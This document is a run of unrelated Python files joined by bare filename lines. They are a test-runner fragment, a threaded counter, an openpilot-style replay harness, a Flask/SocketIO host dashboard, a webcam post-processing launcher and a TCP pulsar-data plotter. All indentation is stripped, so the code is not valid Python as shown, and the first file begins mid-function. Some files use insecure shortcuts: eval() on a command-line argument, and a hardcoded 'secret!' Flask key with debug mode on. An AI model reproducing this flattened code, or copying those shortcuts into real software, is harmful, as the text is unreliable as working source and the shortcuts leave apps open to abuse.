testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs_args = [
sys.executable, os.path.join(
tests_dir, 'combine_logs.py'), testdir]
if BOLD[0]:
combined_logs_args += ['--color']
combined_logs, _ = subprocess.Popen(
combined_logs_args, universal_newlines=True, stdout=subprocess.PIPE).communicate()
print(
"\n".join(
deque(
combined_logs.splitlines(),
combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), TimeResolution.seconds(time_sum)) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: {} s\n".format(TimeResolution.seconds(runtime))
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = GREEN
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), TimeResolution.seconds(self.time)) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test script from script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def check_script_prefixes(all_scripts):
"""Check that no more than `EXPECTED_VIOLATION_COUNT` of the
test scripts don't start with one of the allowed name prefixes."""
EXPECTED_VIOLATION_COUNT = 16
# LEEWAY is provided as a transition measure, so that pull-requests
# that introduce new tests that don't conform with the naming
# convention don't immediately cause the tests to fail.
LEEWAY = 0
good_prefixes_re = re.compile(
"(abc_)?(example|feature|interface|mempool|mining|p2p|rpc|wallet|tool)_")
bad_script_names = [
script for script in all_scripts if good_prefixes_re.match(script) is None]
if len(bad_script_names) < EXPECTED_VIOLATION_COUNT:
print(
"{}HURRAY!{} Number of functional tests violating naming convention reduced!".format(
BOLD[1],
BOLD[0]))
print("Consider reducing EXPECTED_VIOLATION_COUNT from {} to {}".format(
EXPECTED_VIOLATION_COUNT, len(bad_script_names)))
elif len(bad_script_names) > EXPECTED_VIOLATION_COUNT:
print(
"INFO: {} tests not meeting naming conventions (expected {}):".format(len(bad_script_names), EXPECTED_VIOLATION_COUNT))
print(" {}".format("\n ".join(sorted(bad_script_names))))
assert len(bad_script_names) <= EXPECTED_VIOLATION_COUNT + \
LEEWAY, "Too many tests not following naming convention! ({} found, expected: <= {})".format(
len(bad_script_names), EXPECTED_VIOLATION_COUNT)
def get_tests_to_run(test_list, test_params, cutoff, src_timings):
"""
Returns only test that will not run longer that cutoff.
Long running tests are returned first to favor running tests in parallel
Timings from build directory override those from src directory
"""
def get_test_time(test):
# Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the
# list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
return False
else:
print("All RPC commands covered.")
return True
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time, test_suite_name):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "{}".format(test_suite_name),
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(TimeResolution.milliseconds(time)),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(TimeResolution.milliseconds(test_result.time))
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file, encoding="utf8") as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return new list containing existing timings updated with new timings
Tests that do not exists are not removed
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
# we only save test that have passed - timings for failed test might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': TimeResolution.seconds(t.time)},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w', encoding="utf8") as f:
json.dump(merged_timings, f, indent=True)
class TimeResolution:
@staticmethod
def seconds(time_fractional_second):
return round(time_fractional_second)
@staticmethod
def milliseconds(time_fractional_second):
return round(time_fractional_second, 3)
if __name__ == '__main__':
main()
|
multithreaded_increment.py
|
import threading
N = 1000000
counter = 0
LOCK = threading.Lock()
def increment_thread():
global counter
for _ in range(N):
with LOCK:
counter += 1
t1 = threading.Thread(target=increment_thread)
t2 = threading.Thread(target=increment_thread)
t3 = threading.Thread(target=increment_thread)
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
print(f"Counter value is {counter}")
|
process_replay.py
|
#!/usr/bin/env python3
import capnp
import os
import sys
import threading
import importlib
import time
if "CI" in os.environ:
def tqdm(x):
return x
else:
from tqdm import tqdm # type: ignore
from cereal import car, log
from selfdrive.car.car_helpers import get_car
import selfdrive.manager as manager
import cereal.messaging as messaging
from common.params import Params
from cereal.services import service_list
from collections import namedtuple
from selfdrive.manager import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance'])
def wait_for_event(evt):
if not evt.wait(15):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super(FakeSubMaster, self).__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super(FakeSubMaster, self).update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['pathPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock):
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"thermal": [], "health": [], "liveCalibration": [], "dMonitoringState": [], "plan": [], "pathPlan": [], "gpsLocation": [], "liveLocationKalman": [],
"model": [], "frontFrame": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "controlsState": [], "model": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"model": ["pathPlan"], "radarState": ["plan"],
"carState": [], "controlsState": [], "liveParameters": [],
},
ignore=["logMonoTime", "valid", "plan.processingDelay"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=None,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["dMonitoringState"],
"liveCalibration": [], "carState": [], "model": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
),
]
def replay_process(cfg, lr):
proc = managed_processes[cfg.proc_name]
if isinstance(proc, str):
return python_replay_process(cfg, lr)
else:
return cpp_replay_process(cfg, lr)
def python_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
params = Params()
params.clear_all()
params.manager_start()
params.put("OpenpilotEnabledToggle", "1")
params.put("Passive", "0")
params.put("CommunityFeaturesToggle", "1")
os.environ['NO_RADAR_SLEEP'] = "1"
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
# TODO: get a stock VW route
if "Generic Volkswagen" not in msg.carParams.carFingerprint:
os.environ['FINGERPRINT'] = msg.carParams.carFingerprint
break
manager.prepare_managed_process(cfg.proc_name)
mod = importlib.import_module(manager.managed_processes[cfg.proc_name])
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock)
CP = car.CarParams.from_bytes(params.get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
sockets = {s : messaging.sub_sock(s, timeout=1000) for s in sub_sockets}
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
manager.prepare_managed_process(cfg.proc_name)
manager.start_managed_process(cfg.proc_name)
time.sleep(1) # We give the process time to start
log_msgs = []
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for msg in tqdm(pub_msgs):
pm.send(msg.which(), msg.as_builder())
resp_sockets = sub_sockets if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is not None:
log_msgs.append(response)
manager.kill_managed_process(cfg.proc_name)
return log_msgs
|
server.py
|
## Imports
from flask import Flask, render_template, request
from flask_socketio import SocketIO, send, emit
import socket,time,json,struct,os,sys,datetime,re,logging,threading
from operator import itemgetter
## Setup
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
## Routes
@app.route('/')
def loadDefault():
dashboards = getDashboard()
return render_template('main.html', dashboards=dashboards, dashboard=dashboards[0]['name'], hosts=dashboards[0]['hosts'])
@app.route('/dashboard/<dashboard>')
def loadDashboard(dashboard):
dashboards = getDashboard()
dashboard = getDashboard(dashboard)
return render_template('main.html', dashboards=dashboards, dashboard=dashboard['name'], hosts=dashboard['hosts'])
## Functions
def log(tuple):
''' Log messages to the console/log '''
now = str(datetime.datetime.today()).split('.')[0]
print(now,tuple)
def getDashboard(dashboardName=False):
''' Return requested dashboard if specified, otherwise return all dashboards '''
def getData():
''' Return the requested data '''
try:
configFile = 'config.json'
data = json.load(open(configFile,'r'))
return data
except:
log(('ERR','getData','Unable to open',configFile))
return False
data = getData()
if data:
if dashboardName:
for dashboard in data['dashboards']:
if dashboard['name'] == dashboardName: return dashboard
else:
return data['dashboards']
def getHost(dashboardName,hostName):
''' Return requested host '''
dashboard = getDashboard(dashboardName)
if dashboard and hostName:
for host in dashboard['hosts']:
if host['name'] == hostName: return host
else:
return False
# def threadRequest(request):
# response = []
# thread = threading.Thread(target=hostRequest, args=(response,request,))
# thread.start()
# thread.join()
# return response[0]
def hostRequest(request):
''' Make requests against specified hosts '''
log(('DEBUG','GOT REQUEST FROM THREAD:',request))
def socketSnd(sock, msg):
''' Prefix each message with a 4-byte length (network byte order) '''
msg = struct.pack('>I', len(msg)) + msg
sock.sendall(msg)
def socketRcv(sock):
''' Read message length and unpack it into an integer '''
raw_msglen = socketRcvAll(sock, 4)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
# Read the message data
return socketRcvAll(sock, msglen)
def socketRcvAll(sock, n):
''' Helper function to recv n bytes or return None if EOF is hit '''
data = b''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data
def makeRequest(request,host):
try:
hostSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if request['request'] == 'hostHealth':
hostSocket.settimeout(0.5) # Time to wait for response
else:
hostSocket.settimeout(20) # Time to wait for response
sndPayload = request
sndPayload = json.dumps(sndPayload) # Serialse
sndPayload = sndPayload.encode() # Encode
hostSocket.connect( ( host['ip'], int(host['port']) ) )
socketSnd(hostSocket, sndPayload) # Send
rcvPayload = socketRcv(hostSocket) # Receive
rcvPayload = json.loads(rcvPayload) # De-serialse
rcvPayload['host'] = host['name']
hostSocket.close()
return rcvPayload
except socket.error as e:
request['result'] = 'error'
result = request
return result
host = getHost(request['dashboard'],request['host'])
if host:
return makeRequest(request,host)
# response.append(makeRequest(request,host))
else:
return {'action':'hostRequest','result':'error','message': 'No hosts'}
# response.append({'action':'hostRequest','result':'error','message': 'No hosts'})
## Socket Requests
@socketio.on('serverRequest')
def serverRequest(request):
''' Client requests against this server '''
returnData = hostRequest(request)
# returnData = threadRequest(request)
emit('serverResponse', returnData)
## Flask
if __name__ == '__main__':
socketio.run(app, debug=True)
|
multi_webcam_post.py
|
import multiprocessing as mp
import subprocess
import shlex
import argparse
import os
# function to execute command in shell
def run_command(command):
process = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE)
while True:
output = process.stdout.readline()
if process.poll() is not None:
break
if output:
print(output.strip())
rc = process.poll()
return rc
# functions to handle schedule
def start_webcam_post(f_station,f_webcam,f_webcam_dir):
# command for webcam_process
command_line = 'python3 webcam_post_process.py --station={} --webcam={} --webcam_dir={}'.format(f_station,f_webcam,f_webcam_dir)
# execute in command line
run_command(command_line)
"""----------------------------- options -----------------------------"""
parser = argparse.ArgumentParser(description='Multi Webcam Post Processing')
parser.add_argument('--station', type=int,
help='id for station')
parser.add_argument('--webcams', type=str,
help='list of ids for webcam')
parser.add_argument('--output_dir', type=str, default='../outputs/',
help='location of output drive')
args = parser.parse_args()
if __name__ == "__main__":
# create necessary variables
station_id = args.station
webcam_ids = eval(args.webcams)
code_dir = os.getcwd() +'/'
os.chdir(args.output_dir)
output_dir = os.getcwd() +'/'
os.chdir(code_dir)
station_dir = output_dir + 'station_{}/'.format(station_id)
webcam_dirs = {}
for webcam_id in webcam_ids:
webcam_dir = station_dir + 'webcam_{}/'.format(webcam_id)
webcam_dirs[webcam_id] = webcam_dir
# multiprocessing
for webcam_id, webcam_dir in webcam_dirs.items():
mp.Process(target=start_webcam_post, args=(station_id,webcam_id,webcam_dir)).start()
|
pyPeekTCP.py
|
import time
import threading
import socket
import sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import matplotlib.dates as md
import datetime
import struct
import json
np.seterr(divide="ignore", invalid="ignore")
# target = 'B2111+46'
# target = 'B0329+54'
target = "B1133+16"
# struct IntensityHeader {
# int packet_length; // - packet length
# int header_length; // - header length
# int samples_per_packet; // - number of samples in packet (or dimensions, n_freq x n_time x n_stream?)
# int sample_type; // - data type of samples in packet
# double raw_cadence; // - raw sample cadence
# int num_freqs; // - freq list / map
# int samples_summed; // - samples summed for each datum
# uint handshake_idx; // - frame idx at handshake
# double handshake_utc; // - UTC time at handshake
# char stokes_type; // - description of stream (e.g. V / H pol, Stokes-I / Q / U / V)
# // -8 -7 -6 -5 -4 -3 -2 -1 1 2 3 4
# // YX XY YY XX LR RL LL RR I Q U V
# };
header_fmt = "=iiiidiiiId"
stokes_lookup = ["YX", "XY", "YY", "XX", "LR", "RL", "LL", "RR", "I", "Q", "U", "V"]
TCP_IP = "0.0.0.0"
TCP_PORT = 2061
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((TCP_IP, TCP_PORT))
sock.listen(1)
psrcat = json.load(open("psrcat_b.json"))["pulsars"]
psrdata = psrcat[target]
def updatefig(*args):
global waterfall, times, medsub, colorscale
tmin = md.date2num(datetime.datetime.fromtimestamp(np.amin(times)))
tmax = md.date2num(datetime.datetime.fromtimestamp(np.amax(times)))
for i in np.arange(pkt_elems):
if medsub:
p[i].set_data(
waterfall[:, :, i]
- np.nanmedian(waterfall[:, :, i], axis=0)[np.newaxis, :]
)
tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i])
p[pkt_elems + i].set_data(
tmpdata - np.median(tmpdata, axis=0)[np.newaxis, :]
)
else:
p[i].set_data(waterfall[:, :, i])
tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i])
p[pkt_elems + i].set_data(tmpdata)
p[i].set_extent([freqlist[0, 0], freqlist[-1, -1], tmin, tmax])
p[i].set_clim(vmin=colorscale[0], vmax=colorscale[1])
p[pkt_elems + i].set_clim(vmin=colorscale[0] / 10, vmax=colorscale[1] / 10)
return (p,)
def receive(connection, length):
chunks = []
bytes_recd = 0
while bytes_recd < length:
chunk = connection.recv(min(length - bytes_recd, 2048))
if chunk == b"":
raise RuntimeError("socket connection broken")
chunks.append(chunk)
bytes_recd = bytes_recd + len(chunk)
return b"".join(chunks)
connection, client_address = sock.accept()
packed_header = receive(connection, 48)
print(len(packed_header), packed_header)
tcp_header = struct.unpack(header_fmt, packed_header)
pkt_length = tcp_header[0] # packet_length
pkt_header = tcp_header[1] # header_length
pkt_samples = tcp_header[2] # samples_per_packet
pkt_dtype = tcp_header[3] # sample_type
pkt_raw_cad = tcp_header[4] # raw_cadence
pkt_freqs = tcp_header[5] # num_freqs
pkt_elems = tcp_header[6] # num_freqs
pkt_int_len = tcp_header[7] # samples_summed
pkt_idx0 = tcp_header[8] # handshake_idx
pkt_utc0 = tcp_header[9] # handshake_utc
print(tcp_header)
sec_per_pkt_frame = pkt_raw_cad * pkt_int_len
info_header = receive(connection, pkt_freqs * 4 * 2 + pkt_elems * 1)
freqlist = np.fromstring(info_header[: pkt_freqs * 4 * 2], dtype=np.float32).reshape(
-1, 2
) # .mean(axis=1)
freqlist = freqlist / 1e6
elemlist = np.fromstring(info_header[pkt_freqs * 4 * 2 :], dtype=np.int8)
plot_freqs = pkt_freqs / 8
# freqlist = freqlist.reshape(-1,plot_freqs).mean(axis=1)
plot_times = 256 * 4
plot_phase = 128
total_integration = 1024 * 8
if pkt_int_len > total_integration:
print("Pre-integrated to longer than desired time!")
print("{} vs {}".format(pkt_int_len, total_integration))
print("Resetting integration length to {}".format(pkt_int_len))
total_integration = pkt_int_len
local_integration = total_integration / pkt_int_len
waterfall = np.zeros((plot_times, plot_freqs, pkt_elems), dtype=np.float32) + np.nan
countfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32)
fold_period = 1.0 / psrdata["frequency"]
waterfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32)
times = np.zeros(plot_times)
def data_listener():
global connection, sock
global waterfall, waterfold, countfold
global times, total_integration, pkt_idx0
last_idx = pkt_idx0
data_pkt_frame_idx = 0
data_pkt_samples_summed = 1
idx = 0
while True:
try:
d = np.zeros([pkt_freqs, pkt_elems])
n = np.zeros([pkt_freqs, pkt_elems])
t = np.zeros(plot_times)
waterfold *= 0.999
countfold *= 0.999
for i in np.arange(local_integration * pkt_elems):
data = receive(connection, pkt_length + pkt_header)
if len(data) != pkt_length + pkt_header:
print("Lost Connection!")
connection.close()
return
data_pkt_frame_idx, data_pkt_elem_idx, data_pkt_samples_summed = struct.unpack(
"III", data[:pkt_header]
)
d[:, data_pkt_elem_idx] += (
np.fromstring(data[pkt_header:], dtype=np.uint32) * 1.0
)
n[:, data_pkt_elem_idx] += data_pkt_samples_summed * 1.0
fold_idx = np.array(
(
(sec_per_pkt_frame * data_pkt_frame_idx + 0.5 * fold_period)
% fold_period
)
/ fold_period
* plot_phase,
dtype=np.int32,
)
waterfold[fold_idx, :, data_pkt_elem_idx] += (
np.fromstring(data[pkt_header:], dtype=np.uint32)
.reshape(-1, pkt_freqs / plot_freqs)
.mean(axis=1)
)
countfold[fold_idx, :, data_pkt_elem_idx] += data_pkt_samples_summed
roll_idx = (data_pkt_frame_idx - last_idx) / local_integration
times = np.roll(times, roll_idx)
times[0] = sec_per_pkt_frame * (data_pkt_frame_idx - pkt_idx0) + pkt_utc0
# print(d,n)
waterfall = np.roll(waterfall, roll_idx, axis=0)
waterfall[0, :, :] = 10 * np.log10(
(d / n).reshape(-1, pkt_freqs / plot_freqs, pkt_elems).mean(axis=1)
)
if np.mean(n) != total_integration:
print(np.mean(n), np.std(n))
last_idx = data_pkt_frame_idx
# except socket.error, exc:
except:
connection, client_address = sock.accept()
packed_header = receive(connection, 48)
info_header = receive(connection, pkt_freqs * 4 * 2 + pkt_elems * 1)
print("Reconnected!")
thread = threading.Thread(target=data_listener)
thread.daemon = True
thread.start()
time.sleep(1)
f, ax = plt.subplots(2, pkt_elems, gridspec_kw={"height_ratios": [2, 1]})
f.subplots_adjust(right=0.8)
if pkt_elems == 1:
ax = [ax]
plt.ioff()
p = []
tmin = md.date2num(
datetime.datetime.fromtimestamp(
pkt_utc0 - plot_times * local_integration * sec_per_pkt_frame
)
)
tmax = md.date2num(datetime.datetime.fromtimestamp(pkt_utc0))
